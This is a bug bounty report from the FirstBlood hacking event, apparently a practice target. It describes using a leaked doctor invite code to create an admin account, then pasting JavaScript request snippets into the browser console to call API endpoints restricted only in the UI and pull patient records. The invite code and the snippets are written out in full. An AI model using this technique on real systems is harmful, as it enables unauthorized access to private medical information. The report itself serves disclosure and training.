FirstBlood-#167Creating Admin account using a leaked token on r/BugBountyHunter and using restricted API calls .



On 2021-05-11, th4nu0x0 reported:

Summary:

  • On r/BugBountyHunter someone has leaked their doctor registration unique invite code. Using this invite code I was able to create an admin account on firstbloodhackers.com.

  • After logging into the account there was a warning and all API calls where restricted on the admin dashboard.

  • Even though the API calls are restricted and we are unable to view users information on UI, They are only restricted on UI we can use our cookies and make those calls and retrieve the patients information.
  Url to the post: https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/

  Invite code: F16CA47250E445888824A9E63AE445CE

Steps To Reproduce:

  1. Visit registration form enter some username and on invite code enter this F16CA47250E445888824A9E63AE445CE
  2. After this you'll be given a password, Copy it and Login
  3. On Dashboard you'll notice that you are not allowed to view users/patient's information.

  1. Paste this code on your browser console:

    • To get information of an application (Patient) :

      var xhr = new XMLHttpRequest();
      xhr.open("GET", 'drapi/query.php?aptid={application-id}', true); //replace with application id
      
      xhr.onreadystatechange = function() {
          if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
              alert(this.responseText);
              } else { } }
      xhr.send();
    • To search for a patient:

      var xhr = new XMLHttpRequest();
      xhr.open("POST", 'drapi/qp.php', true);
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      
      xhr.onreadystatechange = function() {
        if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
           alert(this.responseText);
               } else { } }
      xhr.send("name={name-here}"); //replace with name

Impact:

  • An attacker use this invite code and create a account and retrieve all patients information.

P2 High

This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Application/Business Logic


FirstBlood ID: 15
Vulnerability Type: Auth issues

A doctors invite code is leaked on the internet which if used grants anyone access to the doctor portal. The invite code should expire after use.

FirstBlood ID: 11
Vulnerability Type: Application/Business Logic

Administrator endpoints can be accessed by non privileged doctor accounts which reveals sensitive patient information.


Respect Earnt: 2500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.